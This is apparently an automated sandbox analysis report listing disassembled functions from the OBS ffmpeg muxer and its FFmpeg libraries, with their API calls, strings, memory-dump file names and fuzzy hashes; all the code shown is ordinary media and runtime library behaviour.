Part of subcall function 00007FF649AA2320: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00007FF649AA29D8,?,?,?,00007FF649AA12F1), ref: 00007FF649AA2357

os_event_wait.OBS ref: 00007FF649AA1CEF
pthread_mutex_lock.W32-PTHREADS ref: 00007FF649AA1D0F
memcpy.VCRUNTIME140 ref: 00007FF649AA1D5D
memcpy.VCRUNTIME140 ref: 00007FF649AA1D76
memcpy.VCRUNTIME140 ref: 00007FF649AA1E2D
memcpy.VCRUNTIME140 ref: 00007FF649AA1E48
os_event_signal.OBS ref: 00007FF649AA1EB8
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF649AA200F

Strings

Error writing to '%s', %s, xrefs: 00007FF649AA1FC3
Error allocating memory for output, xrefs: 00007FF649AA1C97

Memory Dump Source

Source File: 0000000B.00000002.2291350522.00007FF649AA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF649AA0000, based on PE: true

Associated: 0000000B.00000002.2291251062.00007FF649AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291384389.00007FF649AA5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291442922.00007FF649AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291474165.00007FF649AA9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff649aa0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: memcpy$__acrt_iob_func__stdio_common_vfprintffclosefprintfmallocos_event_signalos_event_waitpthread_mutex_lock
String ID: Error allocating memory for output$Error writing to '%s', %s
API String ID: 2637689336-4070097938
Opcode ID: a31c7b85b8c0d82d0157cb35a6e72543ed071c06804e902690462ed57beb3fc0
Instruction ID: 3819604c052d93e9202cf3adb82658e16aeb12101edb4d9c04067cc8def7a70b
Opcode Fuzzy Hash: a31c7b85b8c0d82d0157cb35a6e72543ed071c06804e902690462ed57beb3fc0
Instruction Fuzzy Hash: 0AA13B32A4CA8296E761BF21E4447FD7360FB49B88F444432DE8D8B759DF78E5858720

Function 00007FF8BFB58C00 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 105COMMON

Download Yara Rule

APIs

av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58C44
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58C63
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58C82
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58CA3
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58CC4
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58CE5
av_get_channel_layout_nb_channels.AVUTIL-58 ref: 00007FF8BFB58CFE
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58D15
av_get_channel_layout_nb_channels.AVUTIL-58 ref: 00007FF8BFB58D2A
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58D41
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58D5C
av_log.AVUTIL-58 ref: 00007FF8BFB58D9C

Strings

isf, xrefs: 00007FF8BFB58CBD
och, xrefs: 00007FF8BFB58D37
Failed to set option, xrefs: 00007FF8BFB58D90
uch, xrefs: 00007FF8BFB58D55
icl, xrefs: 00007FF8BFB58C9C
isr, xrefs: 00007FF8BFB58CDE
osr, xrefs: 00007FF8BFB58C7B
ocl, xrefs: 00007FF8BFB58C2B
osf, xrefs: 00007FF8BFB58C5C
ich, xrefs: 00007FF8BFB58D0B

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_opt_set_int$av_get_channel_layout_nb_channels$av_log
String ID: Failed to set option$ich$icl$isf$isr$och$ocl$osf$osr$uch
API String ID: 2637049493-2814753009
Opcode ID: 0f1e360016396a0d2e4be37984f8ca9eacfdb0712dded5c64320b3a02cc610f5
Instruction ID: 0e689b8d55b0c7b49d82f27d39ea8c1a0840d56860de8a25cda274833b01f6fe
Opcode Fuzzy Hash: 0f1e360016396a0d2e4be37984f8ca9eacfdb0712dded5c64320b3a02cc610f5
Instruction Fuzzy Hash: F0413F62B0CA4251FA10ABD9F4906BAB7A1EF997C4F401031DF4D87A99EF3DE405C700

Function 00007FF8A7BF0410 Relevance: 36.1, APIs: 24, Instructions: 131COMMON

Download Yara Rule

APIs

_aligned_free.MSVCRT ref: 00007FF8A7BF043E
_aligned_free.MSVCRT ref: 00007FF8A7BF0475
_aligned_free.MSVCRT ref: 00007FF8A7BF04AD
_aligned_free.MSVCRT ref: 00007FF8A7BF04DD
_aligned_free.MSVCRT ref: 00007FF8A7BF050D
_aligned_free.MSVCRT ref: 00007FF8A7BF0528
_aligned_free.MSVCRT ref: 00007FF8A7BF0531
_aligned_free.MSVCRT ref: 00007FF8A7BF053A
_aligned_free.MSVCRT ref: 00007FF8A7BF0542
_aligned_free.MSVCRT ref: 00007FF8A7BF054A
_aligned_free.MSVCRT ref: 00007FF8A7BF0553
_aligned_free.MSVCRT ref: 00007FF8A7BF055C
_aligned_free.MSVCRT ref: 00007FF8A7BF0564
_aligned_free.MSVCRT ref: 00007FF8A7BF056C
_aligned_free.MSVCRT ref: 00007FF8A7BF0575
_aligned_free.MSVCRT ref: 00007FF8A7BF057E
_aligned_free.MSVCRT ref: 00007FF8A7BF0586
_aligned_free.MSVCRT ref: 00007FF8A7BF058F
_aligned_free.MSVCRT ref: 00007FF8A7BF0598
_aligned_free.MSVCRT ref: 00007FF8A7BF05A1
_aligned_free.MSVCRT ref: 00007FF8A7BF05A9
_aligned_free.MSVCRT ref: 00007FF8A7BF05B2
_aligned_free.MSVCRT ref: 00007FF8A7BF05BC
_aligned_free.MSVCRT ref: 00007FF8A7BF05C6

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free
String ID:
API String ID: 2229574080-0
Opcode ID: b1b7e4f8b11abefead583c2dde418006ab1f199e84be47299285f48100eacfdc
Instruction ID: 2a0991ef1c859cce8761611d322c1acfb25988376ddec3d5b27e87859203c811
Opcode Fuzzy Hash: b1b7e4f8b11abefead583c2dde418006ab1f199e84be47299285f48100eacfdc
Instruction Fuzzy Hash: C1511D66B16512A2DB55EF16D89997E2325FF84FC5F024439DE4D473A2CE6CE802E380

Function 00007FF8BFB5B2B0 Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

av_channel_layout_from_mask.AVUTIL-58 ref: 00007FF8BFB5B314
av_channel_layout_copy.AVUTIL-58 ref: 00007FF8BFB5B32F
av_opt_set_chlayout.AVUTIL-58 ref: 00007FF8BFB5B34F
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB5B370
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB5B394
av_channel_layout_uninit.AVUTIL-58 ref: 00007FF8BFB5B3D2
av_channel_layout_from_mask.AVUTIL-58 ref: 00007FF8BFB5B3E1
av_opt_set_chlayout.AVUTIL-58 ref: 00007FF8BFB5B3F6
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB5B413
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB5B433
av_channel_layout_uninit.AVUTIL-58 ref: 00007FF8BFB5B477

Strings

osf, xrefs: 00007FF8BFB5B409
isr, xrefs: 00007FF8BFB5B38A
isf, xrefs: 00007FF8BFB5B366
ichl, xrefs: 00007FF8BFB5B345
ochl, xrefs: 00007FF8BFB5B3EC
Failed to set option, xrefs: 00007FF8BFB5B460
osr, xrefs: 00007FF8BFB5B429

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_opt_set_int$av_channel_layout_from_maskav_channel_layout_uninitav_opt_set_chlayout$av_channel_layout_copy
String ID: Failed to set option$ichl$isf$isr$ochl$osf$osr
API String ID: 389780152-1201144049
Opcode ID: c1b362974a6b1451826b30618634720778a4b9fcb98fd731a30a779224ad2209
Instruction ID: f5a66effd7f69c02099ef65bc504f482e5f802d6e7f70058ce57615fc64b7b69
Opcode Fuzzy Hash: c1b362974a6b1451826b30618634720778a4b9fcb98fd731a30a779224ad2209
Instruction Fuzzy Hash: 93417C61B08643A1FE659AA9A4607B6B391FF45BC8F809432DF0D6B685EF7DF108C350

Function 00007FF8A7C18800 Relevance: 34.6, APIs: 12, Strings: 11, Instructions: 88stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C18813
strcmp.MSVCRT ref: 00007FF8A7C1882A
strcmp.MSVCRT ref: 00007FF8A7C18841
strcmp.MSVCRT ref: 00007FF8A7C18858
strcmp.MSVCRT ref: 00007FF8A7C1886F
strcmp.MSVCRT ref: 00007FF8A7C18886
strcmp.MSVCRT ref: 00007FF8A7C1889D
strcmp.MSVCRT ref: 00007FF8A7C188B4
strcmp.MSVCRT ref: 00007FF8A7C188CB
strcmp.MSVCRT ref: 00007FF8A7C188DE
strcmp.MSVCRT ref: 00007FF8A7C188F1
strcmp.MSVCRT ref: 00007FF8A7C18904

Strings

s16, xrefs: 00007FF8A7C18823
fltp, xrefs: 00007FF8A7C188C4
s32, xrefs: 00007FF8A7C1883A
s16p, xrefs: 00007FF8A7C18896
dblp, xrefs: 00007FF8A7C188D7
s64p, xrefs: 00007FF8A7C188FD
s64, xrefs: 00007FF8A7C188EA
flt, xrefs: 00007FF8A7C18851
dbl, xrefs: 00007FF8A7C18868
s32p, xrefs: 00007FF8A7C188AD
u8p, xrefs: 00007FF8A7C1887F

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmp
String ID: dbl$dblp$flt$fltp$s16$s16p$s32$s32p$s64$s64p$u8p
API String ID: 1004003707-1774405992
Opcode ID: c5f0c382e97445bf1fdad9ea523356781cb8596a76fcd8cb5a790a5f3faa4372
Instruction ID: 3b81c2d10bacd7b901d6de3e77fc9df250ad27d78942270a572c2477fc1ce174
Opcode Fuzzy Hash: c5f0c382e97445bf1fdad9ea523356781cb8596a76fcd8cb5a790a5f3faa4372
Instruction Fuzzy Hash: 53319E60B0E542B0FB909E22D96127E9385EF917E0F844432EA9DDA1D1EE1CFA40E312

Function 00007FF8BFB57650 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 309COMMON

Download Yara Rule

APIs

av_freep.AVUTIL-58 ref: 00007FF8BFB57784
av_freep.AVUTIL-58 ref: 00007FF8BFB57791
av_mallocz.AVUTIL-58 ref: 00007FF8BFB5779B
av_get_bytes_per_sample.AVUTIL-58 ref: 00007FF8BFB577BB
av_calloc.AVUTIL-58 ref: 00007FF8BFB5782F
memcpy.MSVCRT ref: 00007FF8BFB578D1
memcpy.MSVCRT ref: 00007FF8BFB57905
av_reduce.AVUTIL-58 ref: 00007FF8BFB57934

Strings

Filter length too large, xrefs: 00007FF8BFB579E2
src/libswresample/resample.c, xrefs: 00007FF8BFB57B03
Assertion %s failed at %s:%d, xrefs: 00007FF8BFB57B1A
Unsupported sample format, xrefs: 00007FF8BFB57AF0

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_freepmemcpy$av_callocav_get_bytes_per_sampleav_malloczav_reduce
String ID: Assertion %s failed at %s:%d$Filter length too large$Unsupported sample format$src/libswresample/resample.c
API String ID: 2174235161-2726094951
Opcode ID: c5a204f5f4996df374bfc84a6a3db035d48d9563b93a9ca167c4fa16f58e0cf6
Instruction ID: e0dd103ba28cb486cd3c03c71b6880c8b0ca7b84325065ce94b7f3b558fed5f1
Opcode Fuzzy Hash: c5a204f5f4996df374bfc84a6a3db035d48d9563b93a9ca167c4fa16f58e0cf6
Instruction Fuzzy Hash: CDD1E372A08A858AD765DBA8E4513BEB7A4FB857C4F108337DB4A67690DF3CE445CB00

Function 00007FF8A7BF6890 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 201COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF8A7BF6903
MultiByteToWideChar.KERNEL32 ref: 00007FF8A7BF6945
GetFullPathNameW.KERNEL32 ref: 00007FF8A7BF696E
GetFullPathNameW.KERNEL32 ref: 00007FF8A7BF69A2
wcslen.MSVCRT ref: 00007FF8A7BF69C1
_wsopen.MSVCRT ref: 00007FF8A7BF69EB
_sopen.MSVCRT ref: 00007FF8A7BF6A15
wcslen.MSVCRT ref: 00007FF8A7BF6A98
wcscpy.MSVCRT ref: 00007FF8A7BF6AE5
wcscat.MSVCRT ref: 00007FF8A7BF6AF0
_errno.MSVCRT ref: 00007FF8A7BF6B77
wcscpy.MSVCRT ref: 00007FF8A7BF6BB8
wcscat.MSVCRT ref: 00007FF8A7BF6BC4
_errno.MSVCRT ref: 00007FF8A7BF6BCE
_errno.MSVCRT ref: 00007FF8A7BF6BE3

Strings

\\?\UNC\, xrefs: 00007FF8A7BF6BAE
\\?\, xrefs: 00007FF8A7BF6ADB

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno$ByteCharFullMultiNamePathWidewcscatwcscpywcslen$_sopen_wsopen
String ID: \\?\$\\?\UNC\
API String ID: 2611099503-3019864461
Opcode ID: 8b58886237893d285495af4019e8dee8374e10659ea7d6d5ad0572367657074e
Instruction ID: 5bda19db7cba7c5dbd3c4b91699a91ee2e2265ce5c9d7eb9274e32fd248f07c2
Opcode Fuzzy Hash: 8b58886237893d285495af4019e8dee8374e10659ea7d6d5ad0572367657074e
Instruction Fuzzy Hash: 8871B171A0A642A0EB64AF15A42577E26E0FF44BD4F849139EE9E077D5EFBCD442E300

Function 00007FF8A7BFE100 Relevance: 30.1, APIs: 2, Strings: 15, Instructions: 302stringCOMMON

Download Yara Rule

APIs

strtol.MSVCRT ref: 00007FF8A7BFE144
strtol.MSVCRT ref: 00007FF8A7BFE178

Strings

cu->cuDeviceGet(&hwctx->internal->cuda_device, device_idx), xrefs: 00007FF8A7BFE1EA, 00007FF8A7BFE57C
cu->cuCtxPopCurrent(&dummy), xrefs: 00007FF8A7BFE295, 00007FF8A7BFE5DC
cu->cuDevicePrimaryCtxSetFlags(hwctx->internal->cuda_device, desired_flags), xrefs: 00007FF8A7BFE4CB, 00007FF8A7BFE514
Primary context already active with incompatible flags., xrefs: 00007FF8A7BFE520
Disabling use of CUDA primary device context, xrefs: 00007FF8A7BFE151
Using CUDA primary device context, xrefs: 00007FF8A7BFE430
cu->cuInit(0), xrefs: 00007FF8A7BFE1A7, 00007FF8A7BFE555
Calling %s, xrefs: 00007FF8A7BFE1AE, 00007FF8A7BFE1F1, 00007FF8A7BFE25F, 00007FF8A7BFE29C, 00007FF8A7BFE30F, 00007FF8A7BFE36D, 00007FF8A7BFE4D2
Could not dynamically load CUDA, xrefs: 00007FF8A7BFE48E
cu->cuCtxCreate(&hwctx->cuda_ctx, desired_flags, hwctx->internal->cuda_device), xrefs: 00007FF8A7BFE258, 00007FF8A7BFE59C
-> %s: %s, xrefs: 00007FF8A7BFE3ED, 00007FF8A7BFE610
%s failed, xrefs: 00007FF8A7BFE3C0, 00007FF8A7BFE5E3
cu->cuDevicePrimaryCtxRetain(&hwctx->cuda_ctx, hwctx->internal->cuda_device), xrefs: 00007FF8A7BFE366, 00007FF8A7BFE3AF
cu->cuDevicePrimaryCtxGetState(hwctx->internal->cuda_device, &dev_flags, &dev_active), xrefs: 00007FF8A7BFE308, 00007FF8A7BFE5BC
primary_ctx, xrefs: 00007FF8A7BFE127

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strtol
String ID: -> %s: %s$%s failed$Calling %s$Could not dynamically load CUDA$Disabling use of CUDA primary device context$Primary context already active with incompatible flags.$Using CUDA primary device context$cu->cuCtxCreate(&hwctx->cuda_ctx, desired_flags, hwctx->internal->cuda_device)$cu->cuCtxPopCurrent(&dummy)$cu->cuDeviceGet(&hwctx->internal->cuda_device, device_idx)$cu->cuDevicePrimaryCtxGetState(hwctx->internal->cuda_device, &dev_flags, &dev_active)$cu->cuDevicePrimaryCtxRetain(&hwctx->cuda_ctx, hwctx->internal->cuda_device)$cu->cuDevicePrimaryCtxSetFlags(hwctx->internal->cuda_device, desired_flags)$cu->cuInit(0)$primary_ctx
API String ID: 76114499-3193254869
Opcode ID: b1d8503496d87b39853df48a8e21de1adfc12c32e64f3833a9af2b5287376059
Instruction ID: 6a43544d272e66ec00aac6157a590b02844f3ab487f3bf4576d826ff1720da31
Opcode Fuzzy Hash: b1d8503496d87b39853df48a8e21de1adfc12c32e64f3833a9af2b5287376059
Instruction Fuzzy Hash: 27D18E75A0AA42A2EB589F25E4007BE2762FF84BC8F805036DE4E17794DF7DE506E340

Function 00007FF8A7BE8700 Relevance: 28.9, APIs: 12, Strings: 7, Instructions: 414stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00007FF8A7BE87CB

Strings

", xrefs: 00007FF8A7BE8771, 00007FF8A7BE8DC8
&, xrefs: 00007FF8A7BE8926, 00007FF8A7BE8C88, 00007FF8A7BE8CA0
<, xrefs: 00007FF8A7BE8742
'\'', xrefs: 00007FF8A7BE88BB
, xrefs: 00007FF8A7BE89A7, 00007FF8A7BE89C5, 00007FF8A7BE8AB7, 00007FF8A7BE8AD6
', xrefs: 00007FF8A7BE8C16
>, xrefs: 00007FF8A7BE8753

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strchr
String ID: $&$'$>$<$"$'\''
API String ID: 2830005266-2908976646
Opcode ID: 58878a93e8017a577d70043575bf448a998ddca24cee1ed7eb6ac7db7c468040
Instruction ID: 7838997921ad993a6f628bb6cee772313da48b7888dad0c5571a443b134552bf
Opcode Fuzzy Hash: 58878a93e8017a577d70043575bf448a998ddca24cee1ed7eb6ac7db7c468040
Instruction Fuzzy Hash: DAE1AEB0F0FAA264FB649E1164553BE1782EF42BC5F486435DD0D0A3C6ED2EB947A381

Function 00007FF8A7BF0BA0 Relevance: 28.6, APIs: 19, Instructions: 115COMMON

Download Yara Rule

APIs

_aligned_free.MSVCRT ref: 00007FF8A7BF0BD6
_aligned_free.MSVCRT ref: 00007FF8A7BF0C0D
_aligned_free.MSVCRT ref: 00007FF8A7BF0C3D
_aligned_free.MSVCRT ref: 00007FF8A7BF0C6D
_aligned_free.MSVCRT ref: 00007FF8A7BF0C89
_aligned_free.MSVCRT ref: 00007FF8A7BF0C92
_aligned_free.MSVCRT ref: 00007FF8A7BF0C9B
_aligned_free.MSVCRT ref: 00007FF8A7BF0CA3
_aligned_free.MSVCRT ref: 00007FF8A7BF0CAB
_aligned_free.MSVCRT ref: 00007FF8A7BF0CB4
_aligned_free.MSVCRT ref: 00007FF8A7BF0CBD
_aligned_free.MSVCRT ref: 00007FF8A7BF0CC5
_aligned_free.MSVCRT ref: 00007FF8A7BF0CCE
_aligned_free.MSVCRT ref: 00007FF8A7BF0CD7
_aligned_free.MSVCRT ref: 00007FF8A7BF0CE0
_aligned_free.MSVCRT ref: 00007FF8A7BF0CE8
_aligned_free.MSVCRT ref: 00007FF8A7BF0CF1
_aligned_free.MSVCRT ref: 00007FF8A7BF0CFB
_aligned_free.MSVCRT ref: 00007FF8A7BF0D05

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free
String ID:
API String ID: 2229574080-0
Opcode ID: d09f3d952e3eb66ce5eccd33bd3b0168fb06931170680be69507253bbd36f74d
Instruction ID: cd083823ca4044e08502a53c03c5e5b634fd4256cddf6a3fc6a813e7798a70bd
Opcode Fuzzy Hash: d09f3d952e3eb66ce5eccd33bd3b0168fb06931170680be69507253bbd36f74d
Instruction Fuzzy Hash: 2F413D66B1A511A2EB45EF16D89997E2715FF84FC5F024479DE0D473A2CE3CE842E380

Function 00007FF8BFB8C3C8 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 288COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C459
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C492
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C566
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C577
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C5DA
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C5EA
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8C636
